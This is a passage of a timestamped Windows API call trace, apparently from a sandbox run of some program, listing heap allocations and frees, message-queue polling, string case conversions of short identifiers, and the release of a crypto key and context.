(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.790] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.790] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.790] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.792] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.792] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.792] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0262.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.793] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0262.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0262.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.793] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.793] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0262.794] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.794] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0262.794] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.794] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.794] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.794] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.795] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.795] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.795] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.795] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.795] CryptDestroyKey (hKey=0xaa5760) returned 1 [0262.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.796] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.796] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.796] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.796] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.796] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.796] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.796] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.797] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.797] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.797] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.797] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.797] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.797] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.797] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.797] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.797] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.798] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.798] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.798] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.798] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.798] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.798] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.798] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.798] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.798] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.798] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.798] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.798] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.798] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.798] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.798] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.798] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.799] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.799] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.799] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.799] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.799] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.799] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.799] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.799] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.799] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.799] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.799] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.799] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.799] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.800] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.800] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.800] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0262.800] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.800] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0262.800] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.800] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.800] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.800] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0262.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0262.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0262.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0262.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0262.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.802] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.802] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0262.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.802] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.802] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0262.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.803] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0262.803] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0262.803] FreeLibrary (hLibModule=0x74d40000) returned 1 [0262.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0262.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.803] PeekMessageW (in: 